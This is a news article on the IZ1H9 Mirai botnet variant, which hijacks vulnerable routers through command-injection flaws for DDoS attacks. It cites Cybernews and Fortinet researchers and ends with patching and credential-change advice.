This cyberattack campaign is targeting thousands of routers and turning them into bots for DDoS attacks.
There were thirteen payloads in this variant of Mirai, which was dubbed IZ1H9. Mirai is an old type of malware that’s used to target networked Linux devices and turn them into remotely controlled bots, with this variant turning routers and other IoT devices into zombified bots for large-scale network attacks.
The attackers then incorporate the zombie routers into botnets, enabling them to launch further attacks like DDoS and brute-force attacks.
According to Cybernews, thousands of routers were affected by unauthenticated command injections. Fortinet has counted thousands to even tens of thousands of signatures at the peak of the assault. Furthermore, the impact of this campaign is amplified by the vulnerabilities it exploits being rapidly updated, with researchers stating: “This highlights the campaign’s capacity to infect vulnerable devices and dramatically expand its botnet through the swift utilization of recently released exploit code, which encompasses numerous CVEs (Common Vulnerabilities and Exposures).”
It is reported that D-Link devices are most targeted, with four new critical-severity vulnerabilities that allow remote attackers to deliver command injection via a crafted request.
Cybernews researchers explain that after the payload is injected and executed, it starts by deleting logs to conceal its actions, and then downloads and executes various bot clients to cater to diverse Linux architectures. In the final step, the shell script downloader obstructs network connections on multiple ports.
Fortinet warns “IoT devices have long been an attractive target for threat actors, with remote code execution attacks posing the most common and concerning threats to both IoT devices and Linux servers. The exposure of vulnerable devices can result in severe security risks. Despite the availability of patches for these vulnerabilities, the number of exploit triggers remains alarmingly high, often numbering in the thousands.”
To deal with this threat, researchers recommend applying patches and changing default login credentials.